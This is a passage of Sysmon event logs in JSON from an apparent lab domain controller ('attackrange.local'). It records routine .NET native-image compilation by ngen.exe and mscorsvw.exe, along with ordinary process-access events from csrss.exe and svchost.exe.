dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8308,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:01:07.950\r\nProcessGuid: {A837DB8D-0523-5F25-0000-0010CEA91300}\r\nProcessId: 4800\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\12c0-0\\System.Runtime.WindowsRuntime.UI.Xaml.dll\r\nCreationUtcTime: 2020-08-01 06:01:07.934","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:01:07.950","ProcessGuid":"{A837DB8D-0523-5F25-0000-0010CEA91300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\12c0-0\\System.Runtime.WindowsRuntime.UI.Xaml.dll","CreationUtcTime":"2020-08-01 06:01:07.934","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8309,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:07.981\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0523-5F25-0000-00107CAD1300}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:07.981","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0523-5F25-0000-00107CAD1300}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8310,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:07.981\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0523-5F25-0000-00107CAD1300}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:07.981","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0523-5F25-0000-00107CAD1300}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:07","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8311,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:07.981\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0523-5F25-0000-00107CAD1300}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:07.981","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0523-5F25-0000-00107CAD1300}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:08","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8312,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:08.059\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0524-5F25-0000-001028B11300}\r\nTargetProcessId: 4452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:08.059","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0524-5F25-0000-001028B11300}","TargetProcessId":"4452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:08","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8313,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:08.059\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0524-5F25-0000-001028B11300}\r\nTargetProcessId: 4452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:08.059","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0524-5F25-0000-001028B11300}","TargetProcessId":"4452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:08","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8314,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:08.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0524-5F25-0000-001028B11300}\r\nTargetProcessId: 4452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:08.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0524-5F25-0000-001028B11300}","TargetProcessId":"4452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8315,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:01:09.512\r\nProcessGuid: {A837DB8D-0524-5F25-0000-001028B11300}\r\nProcessId: 4452\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1164-0\\System.Runtime.Serialization.dll\r\nCreationUtcTime: 2020-08-01 06:01:09.512","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:01:09.512","ProcessGuid":"{A837DB8D-0524-5F25-0000-001028B11300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1164-0\\System.Runtime.Serialization.dll","CreationUtcTime":"2020-08-01 06:01:09.512","EventReceivedTime":"2020-08-01 06:01:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8316,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:09.590\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0525-5F25-0000-0010EDB61300}\r\nTargetProcessId: 224\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 